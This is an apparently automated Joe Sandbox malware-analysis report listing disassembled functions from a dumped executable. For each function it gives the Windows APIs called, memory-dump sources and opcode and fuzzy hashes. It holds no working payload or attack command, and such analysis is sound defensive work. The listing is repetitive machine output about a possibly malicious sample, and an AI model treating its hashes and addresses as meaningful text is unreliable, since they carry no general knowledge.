7ff7ca7ac523-7ff7ca7ac52e call 7ff7ca7a43b0 869->874 875 7ff7ca7ac50c-7ff7ca7ac51b 869->875 878 7ff7ca7ac420-7ff7ca7ac424 871->878 879 7ff7ca7ac3c4 871->879 872->865 872->871 874->868 875->874 876->820 876->877 877->867 878->849 881 7ff7ca7ac3c8-7ff7ca7ac3df call 7ff7ca7b2cf8 879->881 885 7ff7ca7ac3e1-7ff7ca7ac3ed 881->885 886 7ff7ca7ac417-7ff7ca7ac41d GetLastError 881->886 887 7ff7ca7ac3ef-7ff7ca7ac401 call 7ff7ca7b2cf8 885->887 888 7ff7ca7ac40c-7ff7ca7ac413 885->888 886->878 887->886 892 7ff7ca7ac403-7ff7ca7ac40a 887->892 888->878 890 7ff7ca7ac415 888->890 890->881 892->888
                                                                                        APIs
                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7AC25B), ref: 00007FF7CA7AC38C
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7AC25B), ref: 00007FF7CA7AC417
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorLastMode
                                                                                        • String ID:
                                                                                        • API String ID: 953036326-0
                                                                                        • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                        • Instruction ID: b0a52941cb9615752afad55985b0c05099b2239c72e13ad98e9848fd6904ecc9
                                                                                        • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                        • Instruction Fuzzy Hash: B391F872E08651B5F750AFA6B4602BDABA0BB48FAAF945175DE0E56684CF38D8418320
                                                                                        Function 00007FF7CA7A4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1279662727-0
                                                                                        • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                        • Instruction ID: 4273bd0ac43a22d368c38be3f924296c482fcc2729f9105fbe6be4fc4d1f0360
                                                                                        • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                        • Instruction Fuzzy Hash: 7E41A522D1878193F710AF62A520379B260FBA8775F50A374DA5C03AD5DF7DA9F08714
                                                                                        Function 00007FF7CA79BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 3251591375-0
                                                                                        • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                        • Instruction ID: 49b5354147e262e17c0615aeac76db803852de5a14d1621bfbd34021169d506b
                                                                                        • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                        • Instruction Fuzzy Hash: BE313F11A4C24249FE54BF7BB435BB99291BF4D3A6FC414B6E90E472D3DE2DA8058231
                                                                                        Function 00007FF7CA7A8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                        • Instruction ID: b77186e68ffb366b50de70177d1347910301ef35d12d7028ab6fa50a907817e1
                                                                                        • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                        • Instruction Fuzzy Hash: E2D06750F1870A9AFA543F7278A957992557FAC722B9024B8DC4A0A393CD2CA80E4660
                                                                                        Function 00007FF7CA79F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
                                                                                        • Instruction ID: a4dfc8829e693f07a7c0064f1de45b46ac2f21e51590c91da7984f03d357ae46
                                                                                        • Opcode Fuzzy Hash: bcfcf1faf55df9f9e23f958511fce33fc2a490ff62131b022dace26bbec7c8c2
                                                                                        • Instruction Fuzzy Hash: 5751E562B0924246FA24BF37B420A7EA291BF4CBB6F948676DD6C477D5CF3CD4008620
                                                                                        Function 00007FF7CA7AB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                        • Instruction ID: aa0f102f93082b806c7fb1aba727ece70a49d67cc56de007afebda20d1280aae
                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                        • Instruction Fuzzy Hash: 14110162A08B8181EA10AF26B850179B361FB88BF5F945371EE7D0B7E9CF3CD8508700
                                                                                        Function 00007FF7CA7A9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C6E
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA7B2032,?,?,?,00007FF7CA7B206F,?,?,00000000,00007FF7CA7B2535,?,?,?,00007FF7CA7B2467), ref: 00007FF7CA7A9C78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 485612231-0
                                                                                        • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                        • Instruction ID: 1d6493ec5e01895ebbe43a566c479143dcb47682a7b220f88ed2d7cd26b56a79
                                                                                        • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                        • Instruction Fuzzy Hash: 94E04F51F0864252FF147FF378641799195BFAC723FC090B0DD0D47251EE2C68554220
                                                                                        Function 00007FF7CA7A9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7CA7A9CE5,?,?,00000000,00007FF7CA7A9D9A), ref: 00007FF7CA7A9ED6
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA7A9CE5,?,?,00000000,00007FF7CA7A9D9A), ref: 00007FF7CA7A9EE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast
                                                                                        • String ID:
                                                                                        • API String ID: 918212764-0
                                                                                        • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                        • Instruction ID: eeccf3506636d1aa6ffe31bfde24f3d782660f239bd6952502b8915579e3b420
                                                                                        • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                        • Instruction Fuzzy Hash: 1D219512F1C68261FB607FA6B460379A2917F8C7B2F8462B5D92D476D2CE6CA8504320
                                                                                        Function 00007FF7CA7AB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                        • Instruction ID: f715749b8c7a1d3fb6fd424840336543f19b0d17edcee2154132483546f41447
                                                                                        • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                        • Instruction Fuzzy Hash: FF41B23290820197FA24AE56F56117DF3A0FB997A2F942171DA8A836D0CF3CED42C770
                                                                                        Function 00007FF7CA7976A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 840049012-0
                                                                                        • Opcode ID: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                        • Instruction ID: 83d94fddd9bca09ea392569875febb3714e44b9349a0010cfdeae15aad2ce144
                                                                                        • Opcode Fuzzy Hash: dd5b2227001afc13c5a7990e13e49d1c192561707a6cc0805bc8ebd48f98ae76
                                                                                        • Instruction Fuzzy Hash: 75219121B0825146FA14AE37B924BBAE741BF4DBE5FC844B2DE0D07782CE3DE441C620
                                                                                        Function 00007FF7CA7AAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                        • Instruction ID: ea2fc463f67cc339a2a8a69ec6218b864cd8f2b9d33d69960605b7369e786df0
                                                                                        • Opcode Fuzzy Hash: 41d876f7d863186cb99ffae5cfc70294694b7844598519de76c307bd1dc1648a
                                                                                        • Instruction Fuzzy Hash: 5431C022E18646A2FF01BF16A86037DA690BB58B73F9121B5DA1D173D2CE7DEC518330
                                                                                        Function 00007FF7CA7A8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                        • String ID:
                                                                                        • API String ID: 3947729631-0
                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                        • Instruction ID: 5b10f424c690cd173b8eadd34acf8b62e71e144747b41836cb77f286a3895f9a
                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                        • Instruction Fuzzy Hash: 18219F33A15705D9FB24AF65E4542EC73A0FB48329F8456BAD62C06AC5DF38D846CB60
                                                                                        Function 00007FF7CA7A52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                        • Instruction ID: e90d3fcdacc8c877a378829552b2ceb920b5f794e91d03d7896f9eb9caf1ca3f
                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                        • Instruction Fuzzy Hash: CD11C622A1D28161FA60BF42F42017EE2A4BF59BA1FD45071EB4D57AC6CF3DDC508760
                                                                                        Function 00007FF7CA7B5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                        • Instruction ID: 60d22ca11c2f3b52770c28cc929c60fbed8105e8c58c3c1dcef64521ffc8feb9
                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                        • Instruction Fuzzy Hash: B121C87261874186EB61AF19F460379B3A0FB98B65F944234DA5E476D5DF3CD8008B10
                                                                                        Function 00007FF7CA79F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                        • Instruction ID: ab56e8c3e4cb33c285bac3f77601e5407164992e197799701c2b9bd7b800ccfb
                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                        • Instruction Fuzzy Hash: 1B017021A0878240FA04AF777910469E795BB59FF1B884671DE6C17BD6DE3DD4128310
                                                                                        Function 00007FF7CA7A720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                        • Instruction ID: 9108f86139c7d4da17dd6cdbed356ea2421980c3d9be421b1235149c4a925118
                                                                                        • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                        • Instruction Fuzzy Hash: AE010421E0D28260FE647FA37521179D2A4BF4D3B2FC461B4F91EC2AC2DE2CEC504224
                                                                                        Function 00007FF7CA7A7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
